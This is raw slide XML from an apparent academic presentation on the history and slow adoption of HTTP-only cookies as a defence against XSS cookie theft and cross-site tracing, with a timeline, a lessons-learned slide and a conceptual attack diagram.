          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="3124200"/>
            <a:ext cx="198131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Django Developers</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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35178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56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3150394" y="6096000"/>
            <a:ext cx="3402806" cy="381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en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ruby on Rails sets  HTTP-only on by default</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="直接连接符 97"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5495926" y="3693765"/>
            <a:ext cx="1219199" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="95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130"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="5767968" y="3652254"/>
            <a:ext cx="1127474" cy="1421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127"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="5347903" y="3908936"/>
            <a:ext cx="605529" cy="4683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13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="3848871"/>
            <a:ext cx="8610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6411" y="3629022"/>
            <a:ext cx="36548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400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2002</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"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86036" y="3629022"/>
            <a:ext cx="36548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400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2003</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"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95661" y="3629022"/>
            <a:ext cx="36548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400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2004</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"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05286" y="3629022"/>
            <a:ext cx="36548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400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2005</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"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14911" y="3629022"/>
            <a:ext cx="36548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400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2006</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"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536" y="3629022"/>
            <a:ext cx="36548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400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2007</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"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34161" y="3629022"/>
            <a:ext cx="36548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400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2008</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"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43786" y="3629022"/>
            <a:ext cx="36548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400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2009</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"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53411" y="3629022"/>
            <a:ext cx="36548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400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2010</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"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1524" y="3352800"/>
            <a:ext cx="1971676" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IE6 introduces HTTP-only</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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400" y="2209800"/>
            <a:ext cx="2895600" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Firefox extension supports HTTP-only</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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19600" y="2743200"/>
            <a:ext cx="2657476" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Firefox 2.0.0.5 supports HTTP-only.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2000" y="4012406"/>
            <a:ext cx="3810001" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Django developers consider supporting HTTP-only, but compatibility concerns held them back. </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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71800" y="4996934"/>
            <a:ext cx="2608422" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ruby on Rails supports HTTP-only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5284113"/>
            <a:ext cx="2895600" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>TRACE method is still on by default on Apache servers and major websites [10]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14800" y="1447800"/>
            <a:ext cx="2864120" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>w3.org  specifies that browsers should disallow TRACE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XMLHTTPRequests</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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60443" y="3124200"/>
            <a:ext cx="1554957" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IETF standard draft includes HTTP-only</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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15200" y="4382869"/>
            <a:ext cx="1752601" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Still no official Django support for HTTP-only</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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-254675" y="4270475"/>
            <a:ext cx="134541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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Server-side Events</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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6771" y="1524000"/>
            <a:ext cx="2821780" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>US-CERT vulnerability note on XST attacks </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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05675" y="2209800"/>
            <a:ext cx="1838325" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Apache.org compromised by cookie stealing XSS attacks</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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0" name="椭圆 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4587240" y="4027646"/>
            <a:ext cx="60960" cy="6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1" name="椭圆 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5654040" y="4130040"/>
            <a:ext cx="60960" cy="6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2" name="椭圆 135"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6035040"/>
            <a:ext cx="60960" cy="6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3" name="椭圆 137"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6339840" y="5120640"/>
            <a:ext cx="60960" cy="6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4" name="椭圆 138"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543799" y="4206240"/>
            <a:ext cx="60960" cy="6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5" name="椭圆 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3414653"/>
            <a:ext cx="60960" cy="6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6" name="椭圆 143"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1691640" y="1752600"/>
            <a:ext cx="60960" cy="6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7" name="椭圆 144"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5334000" y="1981200"/>
            <a:ext cx="60960" cy="6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8" name="椭圆 145"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7330440" y="2887027"/>
            <a:ext cx="60960" cy="6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9" name="椭圆 146"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7239000" y="3472576"/>
            <a:ext cx="60960" cy="6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0" name="椭圆 147"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="2438400"/>
            <a:ext cx="60960" cy="6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1" name="椭圆 148"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4614864" y="2971800"/>
            <a:ext cx="60960" cy="6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cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="42" name="Straight Connector 359"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1280520" y="3828630"/>
            <a:ext cx="230981" cy="47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360"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="467919" y="3845300"/>
            <a:ext cx="230981" cy="47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361"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2905722" y="3809581"/>
            <a:ext cx="230981" cy="47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362"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2093121" y="3826251"/>
            <a:ext cx="230981" cy="47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363"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4530924" y="3809581"/>
            <a:ext cx="230981" cy="47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364"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3718323" y="3826251"/>
            <a:ext cx="230981" cy="47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365"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5343525" y="3809581"/>
            <a:ext cx="230981" cy="47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366"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6968728" y="3809581"/>
            <a:ext cx="230981" cy="47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367"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6156126" y="3826251"/>
            <a:ext cx="230981" cy="47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椭圆 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="4953000"/>
            <a:ext cx="60960" cy="6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2" name="Rectangle 369"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4652963" y="4201180"/>
            <a:ext cx="2586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 smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Python supports HTTP-only. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Django</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> unofficial patch available.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048000" y="3200400"/>
            <a:ext cx="2667000" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IE8 fixes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XMLHTTPResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> exploit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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4" name="椭圆 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5624513" y="3414653"/>
            <a:ext cx="60960" cy="6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962400" y="2209800"/>
            <a:ext cx="3324889" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>TRACE method disabled by all major browsers</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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6" name="椭圆 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730240" y="2453640"/>
            <a:ext cx="60960" cy="6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 rot="16200000">
            <a:off x="-339205" y="2826872"/>
            <a:ext cx="1504951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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Client/Other Events</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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543800" y="1371600"/>
            <a:ext cx="1357313" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Lots of major sites still don’t use </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HTTP-only cookie</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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1" name="椭圆 146"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7422357" y="1905000"/>
            <a:ext cx="60960" cy="6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3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Difficulty in Deploying in Both Ends</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition advTm="24227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Similar deployment issues:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Set-cookie2 header in RFC2965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Updating TCP protocol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Difficulty in Deploying in Both Ends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1371600" y="1676400"/>
            <a:ext cx="5695950" cy="957532"/>
            <a:chOff x="252269" y="2524780"/>
            <a:chExt cx="5695950" cy="957532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69" y="2524780"/>
              <a:ext cx="1409700" cy="957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52869" y="2524780"/>
              <a:ext cx="89535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左右箭头 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1852469" y="2917269"/>
              <a:ext cx="3048000" cy="228600"/>
            </a:xfrm>
            <a:prstGeom prst="left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85800" y="2819400"/>
            <a:ext cx="3179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Add HTTP-only field to cookies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876800" y="2819400"/>
            <a:ext cx="3511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Interpret HTTP-only field correctly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85800" y="3468469"/>
            <a:ext cx="3037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Disable Trace and implement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Set-cookie securely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800600" y="3429000"/>
            <a:ext cx="4031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Implement HTTP-only defense correctly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 advTm="384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Lessons Learned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lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Maintain backward compatibility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marL="514350" indent="-514350">
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>aggressive on client side.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-514350">
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Opt-in? Opt-out!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2362200" y="2667000"/>
            <a:ext cx="3702915" cy="369332"/>
            <a:chOff x="2209800" y="3200400"/>
            <a:chExt cx="3702915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4267200" y="3200400"/>
              <a:ext cx="1645515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B050"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Httponly = true</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" alt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09800" y="3200400"/>
              <a:ext cx="1023550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Httponly</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="右箭头 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3352800" y="3276600"/>
              <a:ext cx="762000" cy="22860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200400" y="4038600"/>
            <a:ext cx="2018615" cy="674132"/>
            <a:chOff x="3276600" y="4343400"/>
            <a:chExt cx="2018615" cy="67413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76600" y="4343400"/>
              <a:ext cx="609600" cy="644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矩形 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3810000" y="4648200"/>
              <a:ext cx="1485215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b="1" cap="none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+Httponly</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US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1200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895600" y="3352800"/>
            <a:ext cx="3397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Questions?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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67000" y="2057400"/>
            <a:ext cx="37775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Thank you!</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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Tm="1391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Backup Slides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Kapil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> Singh et al (2010 Oakland) also proved similar results on  the deployment of HTTP-only cookies:</a:t>
            </a:r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Survey Results</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3429000"/>
            <a:ext cx="8262257" cy="2590800"/>
            <a:chOff x="381000" y="3429000"/>
            <a:chExt cx="8262257" cy="25908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3429000"/>
              <a:ext cx="8262257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矩形 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="533400" y="5486400"/>
              <a:ext cx="8001000" cy="228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27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1143000" y="4267200"/>
            <a:ext cx="2624011" cy="1512332"/>
            <a:chOff x="6707672" y="4865132"/>
            <a:chExt cx="2624011" cy="1512332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="右箭头 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="11438862">
              <a:off x="8370124" y="5173708"/>
              <a:ext cx="941832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右箭头 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="8307872" y="5486400"/>
              <a:ext cx="9906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783872" y="4865132"/>
              <a:ext cx="13992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Modify DOM</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" alt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707672" y="5334000"/>
              <a:ext cx="16042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Disclose user’s </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>confidential</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="右箭头 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="9927204">
              <a:off x="8361593" y="5821495"/>
              <a:ext cx="97009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783872" y="6008132"/>
              <a:ext cx="13569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Install </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
                <a:t>trojan</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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4572000"/>
            <a:ext cx="71619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9" name="组合 68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1752600" y="2209800"/>
            <a:ext cx="3657600" cy="957532"/>
            <a:chOff x="938069" y="2448580"/>
            <a:chExt cx="3657600" cy="957532"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="46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38069" y="2448580"/>
              <a:ext cx="1409700" cy="957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9" name="左右箭头 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2462069" y="2917269"/>
              <a:ext cx="2133600" cy="2286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HTTP-only Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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2362200"/>
            <a:ext cx="685800" cy="65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右箭头 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2828635">
            <a:off x="5590645" y="3614405"/>
            <a:ext cx="2127333" cy="3810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Document.cookie</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50" name="组合 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7391400" y="4724400"/>
            <a:ext cx="1219039" cy="904220"/>
            <a:chOff x="8248120" y="6012500"/>
            <a:chExt cx="1219039" cy="904220"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="51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248120" y="6012500"/>
              <a:ext cx="685800" cy="69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2" name="矩形 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8400520" y="6393500"/>
              <a:ext cx="1066639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cap="none" spc="0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Evil JS</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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</p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="左箭头 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="4648200"/>
            <a:ext cx="2133600" cy="381000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Send back</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5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0" y="4343400"/>
